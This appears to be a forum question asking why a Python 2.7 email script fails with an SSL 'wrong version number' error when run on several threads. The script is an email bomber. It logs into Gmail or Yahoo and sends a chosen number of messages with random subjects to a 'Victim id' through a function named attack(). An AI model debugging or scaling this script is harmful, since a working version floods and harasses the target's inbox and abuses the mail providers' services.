# smtp error whie multithread [ "[Errno 1] _ssl.c:1415: error:1408F10B:SSL routines:SSL3_GET_RECORD:wrong version number"]

Tags: python-2.7

i get this error when i do a multithread to send email

"SMTPServerDisconnected: Connection unexpectedly closed: [Errno 1] _ssl.c:1415: error:1408F10B:SSL routines:SSL3_GET_RECORD:wrong version number"

it works if i send 1 message at a time but does not works when i increase the total count (more than 1)..here is my code

```
import os
import os
import smtplib
import getpass
import sys
from threading import *

os.system('cls' if os.name == 'nt' else 'clear')

def attack():
  global user
  global body
  global to
  global msg
  global status 
  subject = os.urandom(9)
  msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
  server.sendmail(user,to,msg)
  status += 1
  print "\rTotal emails sent: " + str(status)


server = raw_input ('Enter the server Name: ')
user = raw_input('Enter your emailid: ')
passwd = getpass.getpass('Password: ')


to = raw_input('\nVictim id: ')
body = raw_input('Message: ')
total = input('Number of send: ')
status = 0

if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Applies only to gmail and yahoo.'
    sys.exit()

try:
    server = smtplib.SMTP(smtp_server,port)
    server.ehlo()
    if smtp_server == "smtp.gmail.com":
        server.starttls()
    server.login(user,passwd)
    print "[+] Login Success."
except:
    print "login error"

for i in range(int(total)):
       t = Thread(target=attack)
       t.start()
```